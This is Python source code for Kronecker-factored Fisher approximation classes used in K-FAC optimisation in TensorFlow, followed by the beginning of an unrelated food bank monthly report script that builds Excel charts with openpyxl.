# the first dimension of patches_flat i.e. M|T| as the normalizer by
# default. Hence we end up computing 1/M|T| * [[A_l]]^T [[A_l]], with
# shape J|Delta| x J|Delta|. This is related to hat{Omega}_l from
# the paper but has a different scale here for consistency with
# ConvOutputKroneckerFactor.
# (Tilde omitted over A for clarity.)
return compute_cov(patches_flat)
def _get_data_device(self, tower):
return self._inputs[tower].device
class ConvInputMultiKF(ConvInputKroneckerFactor):
def __init__(self,
inputs,
filter_shape,
padding,
num_uses,
strides=None,
dilation_rate=None,
data_format=None,
extract_patches_fn=None,
has_bias=False,
sub_sample_inputs=None,
sub_sample_patches=None,
patch_mask=None):
super(ConvInputMultiKF, self).__init__(inputs,
filter_shape,
padding,
strides=strides,
dilation_rate=dilation_rate,
data_format=data_format,
extract_patches_fn=extract_patches_fn,
has_bias=has_bias,
sub_sample_inputs=sub_sample_inputs,
sub_sample_patches=sub_sample_patches,
patch_mask=patch_mask)
self._num_uses = num_uses
def _partial_batch_size(self, source=0, tower=0):
# Note that some internal computations of "batch_size" done in the parent
# class won't actually be the proper batch size. Instead, they will be
# just "the thing to normalize the statistics by", essentially. This is okay
# as we don't mix the two things up.
return (super(ConvInputMultiKF, self)._partial_batch_size(source=source,
tower=tower)
// self._num_uses)
class ConvInputSUAKroneckerFactor(FisherFactor):
r"""Kronecker factor for the input side of a convolutional layer.
Assumes activations across locations are uncorrelated. Check section 4.2
Theorem 4 in https://arxiv.org/pdf/1602.01407.pdf for further details on the
assumptions. This is a computationally more efficient approximation,
especially for very wide layers.
"""
def __init__(self, inputs, filter_shape, has_bias=False):
"""Initializes ConvInputSUAKroneckerFactor.
If `ASSUME_ZERO_MEAN_ACTIVATIONS` is `True` then the activations are assumed
to have zero mean and the contribution from the `M(j) M(j')` term in
Theorem 4 of https://arxiv.org/pdf/1602.01407.pdf is ignored.
Args:
inputs: List of Tensors of shape [batch_size, ..spatial_input_size..,
in_channels]. Inputs to layer. List index is tower.
filter_shape: List of ints. Contains [..spatial_filter_size..,
in_channels, out_channels]. Shape of convolution kernel.
has_bias: bool. If True, appends 1 to mean activations.
"""
self._inputs = inputs
self._filter_shape = filter_shape
self._has_bias = has_bias
self._kw_kh = np.prod(self._filter_shape[0:-2])
self._in_channels = self._filter_shape[-2]
self._matpower_by_exp_and_damping = OrderedDict() # { (float, hashable): variable }
self._matpower_registrations = set() # { (float, hashable) }
self._damping_funcs_by_id = OrderedDict() # {hashable: lambda}
self._damping_var_by_id = OrderedDict()
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
self._cov_inv_mu_by_damping_id = OrderedDict()
self._rank_one_update_scale_by_damping_id = OrderedDict()
super(ConvInputSUAKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convinsuakron_" + scope_string_from_params(
tuple(self._inputs) + tuple((self._filter_shape, self._has_bias)))
@property
def _cov_shape(self):
"""Returns a list with value [in_channels, in_channels].
NOTE: This does not return the shape of the full cov matrix. Instead it
returns the shape of the matrix that holds the covariance of the input
channel activations, under the assumption mentioned in Theorem 4 of
https://arxiv.org/pdf/1602.01407.pdf. This does not include the bias
dimension and includes only the `Sigma` term from Theorem 4 of the paper.
"""
return [self._in_channels, self._in_channels]
@property
def _num_sources(self):
return 1
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
@property
def mu(self):
return self._mu.value
def _partial_batch_size(self, source=0, tower=0):
assert source == 0
return utils.get_shape(self._inputs[tower])[0]
def _register_damping(self, damping_func):
damping_id = graph_func_to_id(damping_func)
if damping_id not in self._damping_funcs_by_id:
self._damping_funcs_by_id[damping_id] = damping_func
return damping_id
def get_inv_vars(self):
inv_vars = []
inv_vars.extend(self._matpower_by_exp_and_damping.values())
return inv_vars
def instantiate_cov_variables(self):
"""Makes the internal cov variable(s)."""
super(ConvInputSUAKroneckerFactor,
self).instantiate_cov_variables()
# Create variables for computing the mean activations only if
# `ASSUME_ZERO_MEAN_ACTIVATIONS` is set to `False`. Otherwise the
# contribution from the second term in equation 35 in the paper
# https://arxiv.org/pdf/1602.01407.pdf is ignored.
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
with tf.variable_scope(self._var_scope):
self._mu = utils.MovingAverageVariable(
name="mu",
shape=(self._in_channels, 1), # number of input channels.
dtype=self._dtype,
initializer=tf.zeros_initializer(),
normalize_value=ZERO_DEBIAS)
self._acc_mu = utils.AccumulatorVariable(
name="acc_mu",
shape=(self._in_channels, 1),
dtype=self._dtype)
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
"""Constructs and returns the covariance update Op.
Args:
ema_decay: The exponential moving average decay (float or Tensor).
ema_weight: float or Tensor. The weight to put on the newly computed
values. This is typically 1.0 - ema_decay.
should_write: Python or TF bool. If True, we write the covariance to
the variable and reset the accumulator instead of just accumulating.
(Default: True)
Returns:
An Op for updating the covariance Variable referenced by _cov and possibly
updating mean activations.
"""
# The newly computed cov matrix is returned and assigned below to the
# moving average. `new_cov` is required to compute mean activations.
    # Mean activations are given by the last row and col of `new_cov`.
# Remove the last row and col from `new_cov`.
new_cov = super(ConvInputSUAKroneckerFactor, self)._compute_total_new_cov()
new_mu = new_cov[:-1, -1:]
new_cov = new_cov[0:-1, 0:-1]
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
new_cov = new_cov - tf.matmul(new_mu, new_mu, transpose_b=True)
acc_mu_op = accumulate_and_maybe_write(self._acc_mu,
self._mu,
new_mu,
ema_decay,
ema_weight,
should_write)
else:
acc_mu_op = tf.no_op()
if SUBTRACT_MEAN_CONTRIB_FROM_COV:
new_cov = new_cov - tf.matmul(new_mu, new_mu, transpose_b=True)
acc_cov_op = accumulate_and_maybe_write(self._acc_cov,
self._cov,
new_cov,
ema_decay,
ema_weight,
should_write)
return tf.group(acc_cov_op, acc_mu_op)
def _compute_new_cov(self, source, tower):
assert source == 0
inputs = self._inputs[tower]
# Reshape inputs to compute [in_channels, in_channels] shape cov.
channel_inputs = tf.reshape(inputs, shape=(-1, self._in_channels))
# Append the bias dimension as we need this to calculate mean activations.
channel_inputs = append_homog(channel_inputs)
return compute_cov(channel_inputs)
def register_matpower(self, exp, damping_func):
"""Registers a matrix power to be maintained and served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_matpower.
Args:
exp: float. The exponent to use in the matrix power.
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
if exp == 1.0:
return
if exp != -1:
raise ValueError("ConvInputSUAKroneckerFactor supports only"
"matrix inversion")
damping_id = self._register_damping(damping_func)
if (exp, damping_id) not in self._matpower_registrations:
self._matpower_registrations.add((exp, damping_id))
def _compute_sm_rank_one_update_quants(self, exp, damping_id, damping_value):
"""Returns tensors to compute Fisher inv using Sherman-Morrison formula."""
cov_inv = self._matpower_by_exp_and_damping[(exp, damping_id)]
cov_inv_mu = tf.matmul(cov_inv, self.mu)
hatmu_t_cov_inv_hatmu = self._kw_kh * tf.squeeze(
tf.matmul(self.mu, cov_inv_mu, transpose_a=True))
if self._has_bias:
tildemu_t_cov_inv_tildemu = hatmu_t_cov_inv_hatmu + (1. / damping_value)
return cov_inv_mu, (1. / (1. + tildemu_t_cov_inv_tildemu))
else:
return cov_inv_mu, (1. / (1. + hatmu_t_cov_inv_hatmu))
def get_matpower(self, exp, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov (except when exp == 1).
if exp == 1:
return self._make_cov_linear_operator(
damping=tf.cast(damping_func(), dtype=self._dtype))
elif exp == -1:
damping_id = graph_func_to_id(damping_func)
cov_inv = self._matpower_by_exp_and_damping[(exp, damping_id)]
damping_value = self._damping_var_by_id[damping_id]
# Replicates the in_channels * in_channels cov inverse matrix.
# Note that in this function the replications are not done explicitly.
# They are done using tf.linalg ops and hence they are computationally
# efficient.
quant_1 = tf.linalg.LinearOperatorKronecker([
tf.linalg.LinearOperatorFullMatrix(
cov_inv,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True),
tf.linalg.LinearOperatorIdentity(
num_rows=self._kw_kh, dtype=self._dtype)
])
      # If a bias dimension needs to be appended then we need to expand
      # scaled_cov_inv_mu and assign `1` to the last dimension. Also we need
      # to append the inverse of the damping constant (a 1 x 1 matrix) to
      # the replicated cov inverse matrix.
if self._has_bias:
bias_operator = tf.linalg.LinearOperatorFullMatrix(
[[1. / damping_value]],
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
cov_inv_kron_identity_operator = tf.linalg.LinearOperatorBlockDiag(
[quant_1, bias_operator])
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
cov_inv_mu = self._cov_inv_mu_by_damping_id[damping_id]
scale = self._rank_one_update_scale_by_damping_id[damping_id]
# Compute cov_inv_mu kron 1's vec. We tile the cov_inv_mu on the last
# dim and then reshape.
mean_update = (
tf.expand_dims(
append_homog(
tf.reshape(tf.tile(cov_inv_mu, [1, self._kw_kh]), (-1,)),
homog_value=(1. / damping_value)),
axis=1))
else:
cov_inv_kron_identity_operator = quant_1
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
cov_inv_mu = self._cov_inv_mu_by_damping_id[damping_id]
scale = self._rank_one_update_scale_by_damping_id[damping_id]
# Compute cov_inv_mu kron 1's vec. We tile the cov_inv_mu on the last
# dim and then reshape.
mean_update = tf.reshape(
tf.tile(cov_inv_mu, [1, self._kw_kh]), (-1, 1))
if ASSUME_ZERO_MEAN_ACTIVATIONS:
return cov_inv_kron_identity_operator
else:
        # To include the contribution from the mean activations we need a
        # low-rank update op. Note that the Sherman-Morrison formula requires
        # the negative of the (mean_update * mean_update^T) / scale term to
        # be added. To achieve this with `LinearOperatorLowRankUpdate`, set
        # `v` to the negative of the mean update vector multiplied by scale.
return tf.linalg.LinearOperatorLowRankUpdate(
cov_inv_kron_identity_operator,
mean_update,
v=-scale * mean_update,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
else:
raise ValueError("ConvInputSUAKroneckerFactor only supports"
"computing inverse of cov matrix.")
def make_inverse_update_ops(self):
"""Creates and return update ops for registered computations."""
inverse_ops = []
for (exp,
damping_id), matpower in self._matpower_by_exp_and_damping.items():
assert exp == -1
damping = tf.cast(self._damping_funcs_by_id[damping_id](), self._dtype)
damping_assign_op = utils.smart_assign(
self._damping_var_by_id[damping_id], damping)
inverse_op = utils.smart_assign(matpower,
utils.posdef_inv(self.cov, damping))
inverse_ops.append(damping_assign_op)
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
with tf.control_dependencies([inverse_op]):
(cov_inv_mu,
rank_one_update_scale) = self._compute_sm_rank_one_update_quants(
exp, damping_id, damping)
inverse_ops.append(
utils.smart_assign(self._cov_inv_mu_by_damping_id[damping_id],
cov_inv_mu))
inverse_ops.append(
utils.smart_assign(
self._rank_one_update_scale_by_damping_id[damping_id],
rank_one_update_scale))
else:
inverse_ops.append(inverse_op)
return inverse_ops
def get_inverse(self, damping_func):
# Just for backwards compatibility of some old code and tests
return self.get_matpower(-1, damping_func)
def instantiate_inv_variables(self):
"""Makes the internal "inverse" variable(s)."""
for (exp, damping_id) in self._matpower_registrations:
if exp != -1.:
raise ValueError("ConvInputSUAKroneckerFactor only supports inverse"
"computation")
exp_string = scalar_or_tensor_to_string(exp)
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
matpower = tf.get_variable(
"matpower_exp{}_damp{}".format(exp_string, damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert (exp, damping_id) not in self._matpower_by_exp_and_damping
self._matpower_by_exp_and_damping[(exp, damping_id)] = matpower
self._damping_var_by_id[damping_id] = tf.get_variable(
"damping_var_{}_{}".format(exp_string, damping_string),
initializer=tf.zeros_initializer(),
shape=(),
trainable=False,
dtype=self._dtype,
use_resource=True)
if not ASSUME_ZERO_MEAN_ACTIVATIONS:
self._cov_inv_mu_by_damping_id[damping_id] = tf.get_variable(
"cov_inv_mu_{}_{}".format(exp_string, damping_string),
initializer=tf.zeros_initializer(),
shape=(self._in_channels, 1),
trainable=False,
dtype=self._dtype,
use_resource=True)
self._rank_one_update_scale_by_damping_id[damping_id] = tf.get_variable(
"rank_one_update_scale_{}_{}".format(exp_string, damping_string),
initializer=tf.zeros_initializer(),
shape=(),
trainable=False,
dtype=self._dtype,
use_resource=True)
def _make_cov_linear_operator(self, damping=None):
"""Returns cov as a linear operator.
Args:
damping: Damping value tensor. If `damping` is not None then returns
damped covariance matrix.
Returns:
tf.linalg.LinearOperator instance.
"""
if damping is not None:
cov = self.cov + damping * tf.eye(self._cov_shape[0], dtype=self._dtype)
else:
cov = self.cov
cov_operator = tf.linalg.LinearOperatorKronecker([
tf.linalg.LinearOperatorFullMatrix(
cov, is_self_adjoint=True, is_square=True),
tf.linalg.LinearOperatorIdentity(
num_rows=self._kw_kh, dtype=self._dtype)
])
if self._has_bias:
bias_value = damping if damping is not None else 0.
bias_operator = tf.linalg.LinearOperatorFullMatrix([[bias_value]],
is_self_adjoint=True,
is_square=True)
cov_operator = tf.linalg.LinearOperatorBlockDiag(
[cov_operator, bias_operator])
if ASSUME_ZERO_MEAN_ACTIVATIONS:
return cov_operator
else:
# self.mu kron 1's vec is computed below by tiling mu.
hatmu = tf.tile(self.mu, [1, self._kw_kh])
if self._has_bias:
tildemu = append_homog(tf.reshape(hatmu, (-1,)))
mean_update = tf.expand_dims(tildemu, axis=1)
else:
mean_update = tf.reshape(hatmu, (-1, 1))
return tf.linalg.LinearOperatorLowRankUpdate(
cov_operator, mean_update, is_self_adjoint=True, is_square=True)
def get_cov_as_linear_operator(self):
return self._make_cov_linear_operator()
  def get_cholesky(self, damping_func):
    raise NotImplementedError("ConvInputSUAKroneckerFactor does not support "
                              "cholesky factorization")
  def get_cholesky_inverse(self, damping_func):
    raise NotImplementedError("ConvInputSUAKroneckerFactor does not support "
                              "cholesky inverse computation")
  def register_cholesky(self):
    raise NotImplementedError("ConvInputSUAKroneckerFactor does not support "
                              "cholesky factorization")
  def register_cholesky_inverse(self):
    raise NotImplementedError("ConvInputSUAKroneckerFactor does not support "
                              "cholesky inverse computation")
def _get_data_device(self, tower):
return self._inputs[tower].device
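# A minimal sketch (illustrative only, not used by the classes above) of the
# Sherman-Morrison identity that `_compute_sm_rank_one_update_quants` and the
# `LinearOperatorLowRankUpdate` branch of `get_matpower` rely on:
#   (A + u u^T)^{-1} = A^{-1} - (A^{-1} u u^T A^{-1}) / (1 + u^T A^{-1} u)
# The helper name is hypothetical; only the module-level `np` import is assumed.
def _sherman_morrison_identity_sketch():
  rng = np.random.RandomState(0)
  a = rng.randn(4, 4)
  mat = a.dot(a.T) + 4. * np.eye(4)  # stand-in for a damped covariance matrix
  u = rng.randn(4, 1)                # stand-in for the (scaled) mean vector
  lhs = np.linalg.inv(mat + u.dot(u.T))
  mat_inv = np.linalg.inv(mat)
  scale = 1. / (1. + float(u.T.dot(mat_inv).dot(u)))
  rhs = mat_inv - scale * mat_inv.dot(u).dot(u.T).dot(mat_inv)
  return np.allclose(lhs, rhs)       # True: both sides agree numerically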
class ConvOutputKroneckerFactor(DenseSquareMatrixFactor):
r"""Kronecker factor for the output side of a convolutional layer.
Estimates E[ ds ds^T ] where s is the preactivations of a convolutional layer
given example x and ds = (d / d s) log(p(y|x, w)). Expectation is taken over
all examples and locations.
  Equivalent to Gamma in https://arxiv.org/abs/1602.01407; see Section 3.1,
  "Estimating the factors", for details.
"""
def __init__(self, outputs_grads, data_format=None):
"""Initializes ConvOutputKroneckerFactor.
Args:
outputs_grads: List of list of Tensors. Each Tensor is of shape
[batch_size, ..spatial_input_size.., out_channels]. First list index
is source, the second is tower.
data_format: None or str. Format of outputs_grads.
Raises:
ValueError: If channels are not final dimension.
"""
if not utils.is_data_format_channel_last(data_format):
raise ValueError("Channel must be last.")
self._out_channels = outputs_grads[0][0].shape.as_list()[-1]
self._outputs_grads = outputs_grads
super(ConvOutputKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convoutkron_" + scope_string_from_params(
nest.flatten(self._outputs_grads))
@property
def _cov_shape(self):
size = self._out_channels
return [size, size]
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._outputs_grads[0])
@property
def _dtype(self):
return self._outputs_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
def _compute_new_cov(self, source, tower):
outputs_grad = self._outputs_grads[source][tower]
# reshaped_tensor below is the matrix DS_l defined in the KFC paper
# (tilde omitted over S for clarity). It has shape M|T| x I, where
# M = minibatch size, |T| = number of spatial locations, and
# I = number of output maps for convolutional layer l.
reshaped_tensor = tf.reshape(outputs_grad, [-1, self._out_channels])
# Following the reasoning in ConvInputKroneckerFactor._compute_new_cov,
# compute_cov here returns 1/M|T| * DS_l^T DS_l = hat{Gamma}_l
# as defined in the paper, with shape I x I.
# (Tilde omitted over S for clarity.)
return compute_cov(reshaped_tensor)
def _get_data_device(self, tower):
return self._outputs_grads[0][tower].device
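# Illustrative NumPy-only sketch of what `_compute_new_cov` above computes for a
# single tower: gradients of shape [batch, spatial..., out_channels] are
# flattened over batch and spatial locations, and the I x I factor is the
# normalized Gram matrix of the result. The shapes below are arbitrary example
# values; only the module-level `np` import is assumed.
def _conv_output_factor_sketch():
  grads = np.random.RandomState(0).randn(8, 5, 5, 16)  # [M, H, W, I]
  ds = grads.reshape(-1, grads.shape[-1])              # [M*|T|, I]
  return ds.T.dot(ds) / ds.shape[0]                    # approximates hat{Gamma}_l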
class ConvOutputMultiKF(ConvOutputKroneckerFactor):
def __init__(self, outputs_grads, num_uses, data_format=None):
super(ConvOutputMultiKF, self).__init__(outputs_grads,
data_format=data_format)
self._num_uses = num_uses
def _partial_batch_size(self, source=0, tower=0):
    # Note that some internal computations of "batch_size" done in the parent
# class won't actually be the proper batch size. Instead, they will be
# just "the thing to normalize the statistics by", essentially. This is okay
# as we don't mix the two things up.
return (super(ConvOutputMultiKF, self)._partial_batch_size(source=source,
tower=tower)
// self._num_uses)
class FullyConnectedMultiKF(FullyConnectedKroneckerFactor):
"""Kronecker factor for a fully connected layer used multiple times."""
def __init__(self,
tensors,
num_uses=None,
has_bias=False):
"""Constructs a new `FullyConnectedMultiKF`.
Args:
      tensors: List of list of Tensors, each of shape
        [num_uses * batch_size, n], which is a reshaped version of a Tensor
        of shape [num_uses, batch_size, n]. Each of these tensors is usually
        a layer's inputs or its output's gradients. The first list index is
        sources, the second is towers.
num_uses: int. The number of time-steps / uses.
has_bias: bool. If True, '1' is appended to each row.
"""
self._num_uses = num_uses
self._cov_dt1 = None
self._acc_cov_dt1 = None
self._make_cov_dt1 = False
self._option1quants_by_damping = OrderedDict()
self._option2quants_by_damping = OrderedDict()
self._option1quants_registrations = set()
self._option2quants_registrations = set()
super(FullyConnectedMultiKF, self).__init__(tensors=tensors,
has_bias=has_bias)
@property
def _num_timesteps(self):
return self._num_uses
def _partial_batch_size(self, source=0, tower=0):
total_len = utils.get_shape(self._tensors[source][tower])[0]
return total_len // self._num_timesteps
@property
def _var_scope(self):
return "ff_fc_multi_" + scope_string_from_params(
tuple(nest.flatten(self._tensors))
+ (self._num_timesteps, self._has_bias,))
def get_inv_vars(self):
inv_vars = super(FullyConnectedMultiKF, self).get_inv_vars()
inv_vars.extend(self._option1quants_by_damping.values())
inv_vars.extend(self._option2quants_by_damping.values())
return inv_vars
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
op = super(FullyConnectedMultiKF, self).make_covariance_update_op(
ema_decay, ema_weight, should_write=should_write)
if self._cov_dt1 is not None:
new_cov_dt1_contribs = []
for source in range(self._num_sources):
for tower in range(self._num_towers):
with maybe_place_on_device(self._get_data_device(tower)):
new_cov_dt1_contribs.append(self._compute_new_cov_dt1(source,
tower))
new_cov_dt1 = (tf.add_n(new_cov_dt1_contribs) / float(self._num_towers))
# See comments in FisherFactor.make_covariance_update_op() for details.
new_cov_dt1 = utils.all_average(new_cov_dt1)
op2 = accumulate_and_maybe_write(self._acc_cov_dt1,
self._cov_dt1,
new_cov_dt1,
ema_decay,
ema_weight,
should_write)
# TODO(b/69112164):
# It's important that _cov and _cov_dt1 remain consistent with each
# other while the inverse ops are happening. How can we ensure this?
# We will need to add explicit synchronization for this to
# work with asynchronous training.
op = tf.group(op, op2)
return op
def _compute_new_cov_dt1(self, source, tower): # pylint: disable=missing-docstring
tensor = self._tensors[source][tower]
if self._has_bias:
# This appending is technically done twice (the other time is for
# _compute_new_cov())
tensor = append_homog(tensor)
total_len = utils.get_shape(tensor)[0]
batch_size = total_len // self._num_timesteps
tensor_present = tensor[:-batch_size, :]
tensor_future = tensor[batch_size:, :]
# We specify a normalizer for this computation to ensure a PSD Fisher
# block estimate. This is equivalent to padding with zeros, as was done
# in Section B.2 of the appendix.
return compute_cov(
tensor_future, tensor_right=tensor_present, normalizer=total_len)
def _get_data_device(self, tower):
return self._tensors[0][tower].device
@property
def _vec_shape(self):
size = self._tensors[0][0].shape[1] + self._has_bias
return [size]
def get_option1quants(self, damping_func):
damping_id = graph_func_to_id(damping_func)
return self._option1quants_by_damping[damping_id]
def get_option2quants(self, damping_func):
damping_id = graph_func_to_id(damping_func)
return self._option2quants_by_damping[damping_id]
@property
def cov_dt1(self):
assert self._cov_dt1 is not None
return self._cov_dt1.value
def get_cov_vars(self):
cov_vars = super(FullyConnectedMultiKF, self).get_cov_vars()
if self._make_cov_dt1:
cov_vars += [self.cov_dt1]
return cov_vars
def register_cov_dt1(self):
self._make_cov_dt1 = True
def instantiate_cov_variables(self):
super(FullyConnectedMultiKF, self).instantiate_cov_variables()
assert self._cov_dt1 is None
if self._make_cov_dt1:
with tf.variable_scope(self._var_scope):
self._cov_dt1 = utils.MovingAverageVariable(
name="cov_dt1",
shape=self._cov_shape,
dtype=self._dtype,
initializer=tf.zeros_initializer(),
normalize_value=ZERO_DEBIAS)
self._acc_cov_dt1 = utils.AccumulatorVariable(
name="acc_cov_dt1",
shape=self._cov_shape,
dtype=self._dtype)
def register_option1quants(self, damping_func):
damping_id = self._register_damping(damping_func)
if damping_id not in self._option1quants_registrations:
self._option1quants_registrations.add(damping_id)
def register_option2quants(self, damping_func):
damping_id = self._register_damping(damping_func)
if damping_id not in self._option2quants_registrations:
self._option2quants_registrations.add(damping_id)
def instantiate_inv_variables(self):
super(FullyConnectedMultiKF, self).instantiate_inv_variables()
for damping_id in self._option1quants_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
# It's questionable as to whether we should initialize with stuff like
# this at all. Ideally these values should never be used until they are
# updated at least once.
with tf.variable_scope(self._var_scope):
Lmat = tf.get_variable( # pylint: disable=invalid-name
"Lmat_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
psi = tf.get_variable(
"psi_damp{}".format(damping_string),
initializer=tf.ones_initializer(),
shape=self._vec_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._option1quants_by_damping
self._option1quants_by_damping[damping_id] = (Lmat, psi)
for damping_id in self._option2quants_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
# It's questionable as to whether we should initialize with stuff like
# this at all. Ideally these values should never be used until they are
# updated at least once.
with tf.variable_scope(self._var_scope):
Pmat = tf.get_variable( # pylint: disable=invalid-name
"Lmat_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
Kmat = tf.get_variable( # pylint: disable=invalid-name
"Kmat_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
mu = tf.get_variable(
"mu_damp{}".format(damping_string),
initializer=tf.ones_initializer(),
shape=self._vec_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._option2quants_by_damping
self._option2quants_by_damping[damping_id] = (Pmat, Kmat, mu)
def make_inverse_update_ops(self):
"""Create and return update ops corresponding to registered computations."""
# TODO(b/69918258): Add correctness tests for this method.
# pylint: disable=invalid-name
ops = []
if (len(self._option1quants_by_damping) +
len(self._option2quants_by_damping)):
# Note that C0 and C1 are stand-ins for A0 and A1, or G0 and G1, from
# the pseudo-code in the original paper. Because the computations for
# the A and G case are essentially the same they can both be performed by
# the same class (this one).
C1 = self.cov_dt1
# Get the eigendecomposition of C0 (= self.cov)
eigen_e, eigen_V = self.get_eigendecomp()
# TODO(b/69678661): Note, there is an implicit assumption here that C1
# and C0 (as represented here by its eigen-decomp) are consistent. This
# could fail to be the case if self._cov and self._cov_dt1 are not updated
# consistently, or are somehow read between or during the cov updates.
# Can this possibly happen? Is there a way to prevent it?
for damping_id, (Lmat_var,
psi_var) in self._option1quants_by_damping.items():
damping = self._damping_funcs_by_id[damping_id]()
damping = tf.cast(damping, self._dtype)
invsqrtC0 = tf.matmul(
eigen_V * (eigen_e + damping)**(-0.5), eigen_V, transpose_b=True)
# Might need to enforce symmetry lost due to numerical issues.
invsqrtC0 = (invsqrtC0 + tf.transpose(invsqrtC0)) / 2.0
# The following line imposes the symmetry assumed by "Option 1" on C1.
# Strangely the code can work okay with this line commented out,
# depending on how psd_eig is defined. I'm not sure why.
C1 = (C1 + tf.transpose(C1)) / 2.0
# hPsi = C0^(-1/2) * C1 * C0^(-1/2) (hPsi means hat{Psi})
hPsi = tf.matmul(tf.matmul(invsqrtC0, C1), invsqrtC0)
# Compute the decomposition U*diag(psi)*U^T = hPsi
psi, U = utils.posdef_eig(hPsi)
# L = C0^(-1/2) * U
Lmat = tf.matmul(invsqrtC0, U)
ops.append(utils.smart_assign(Lmat_var, Lmat))
ops.append(utils.smart_assign(psi_var, psi))
for damping_id, (Pmat_var, Kmat_var,
mu_var) in self._option2quants_by_damping.items():
damping = self._damping_funcs_by_id[damping_id]()
damping = tf.cast(damping, self._dtype)
# compute C0^(-1/2)
invsqrtC0 = tf.matmul(
eigen_V * (eigen_e + damping)**(-0.5), eigen_V, transpose_b=True)
# Might need to enforce symmetry lost due to numerical issues.
invsqrtC0 = (invsqrtC0 + tf.transpose(invsqrtC0)) / 2.0
# Compute the product C0^(-1/2) * C1
invsqrtC0C1 = tf.matmul(invsqrtC0, C1)
# hPsi = C0^(-1/2) * C1 * C0^(-1/2) (hPsi means hat{Psi})
hPsi = tf.matmul(invsqrtC0C1, invsqrtC0)
# Compute the decomposition E*diag(mu)*E^T = hPsi^T * hPsi
        # Note that we are using the notation mu instead of "m" for the eigenvalues.
# Instead of computing the product hPsi^T * hPsi and then doing an
# eigen-decomposition of this we just compute the SVD of hPsi and then
# square the singular values to get the eigenvalues. For a justification
# of this approach, see:
# https://en.wikipedia.org/wiki/Singular-value_decomposition#Relation_to_eigenvalue_decomposition
sqrtmu, _, E = tf.svd(hPsi)
mu = tf.square(sqrtmu)
        # Mathematically, the eigenvalues should not exceed 1.0, but
# due to numerical issues, or possible issues with inconsistent
# values of C1 and (the eigen-decomposition of) C0 they might. So
# we enforce this condition.
mu = tf.minimum(mu, 1.0)
# P = (C0^(-1/2) * C1)^T * C0^(-1/2) = C_1^T * C_0^(-1)
Pmat = tf.matmul(invsqrtC0C1, invsqrtC0, transpose_a=True)
# K = C_0^(-1/2) * E
Kmat = tf.matmul(invsqrtC0, E)
ops.append(utils.smart_assign(Pmat_var, Pmat))
ops.append(utils.smart_assign(Kmat_var, Kmat))
ops.append(utils.smart_assign(mu_var, mu))
ops += super(FullyConnectedMultiKF, self).make_inverse_update_ops()
return [tf.group(*ops)]
# pylint: enable=invalid-name
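# Illustrative check (plain NumPy, not wired into the factor above) of the
# relation exploited when computing `mu` in `make_inverse_update_ops`: the
# eigenvalues of hPsi^T hPsi equal the squared singular values of hPsi, so a
# single SVD of hPsi suffices. The matrix below is an arbitrary stand-in.
def _svd_vs_eig_sketch():
  h_psi = np.random.RandomState(0).randn(5, 5)
  singular_values = np.linalg.svd(h_psi, compute_uv=False)
  eigvals = np.linalg.eigvalsh(h_psi.T.dot(h_psi))
  return np.allclose(np.sort(singular_values**2), np.sort(eigvals))  # True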
``` |
{
"source": "2018-Arizona-Opportunity-Hack/Team15",
"score": 3
} |
#### File: Team15/FBM Utility/GenerateMonthlyReport.py
```python
import sys
import calendar
import datetime
from dateutil.relativedelta import relativedelta
import operator
import pandas as pd
import numpy as np
import openpyxl
from FoodBankManager import FBM
import FixedData
def add_data(chart, data, from_rows=False, titles_from_data=False, title=None):
"""
Add a range of data in a single pass.
The default is to treat each column as a data series.
"""
if not isinstance(data, openpyxl.chart.Reference):
data = openpyxl.chart.Reference(range_string=data)
if from_rows:
values = data.rows
else:
values = data.cols
for v in values:
range_string = u"{0}!{1}:{2}".format(data.sheetname, v[0], v[-1])
series = openpyxl.chart.series_factory.SeriesFactory(range_string, title_from_data=titles_from_data, title=title)
        chart.ser.append(series)
def FindLastMonthsDates():
"""
Finds the first and last days of last month
:return: (first_of_month, last_of_month)
:rtype: tuple(datetime.date, datetime.date)
"""
now = datetime.date.today()
last_of_month = now.replace(day=1) - datetime.timedelta(days=1)
first_of_month = last_of_month.replace(day=1)
return first_of_month, last_of_month
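# For example (illustrative dates only): if today were 2018-10-15, the helper
# above would return (datetime.date(2018, 9, 1), datetime.date(2018, 9, 30)),
# since replacing the day with 1 and stepping back one day lands on the last
# day of the previous month.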
def RunMonthlyReport(FBMInst,month=None, year=None):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
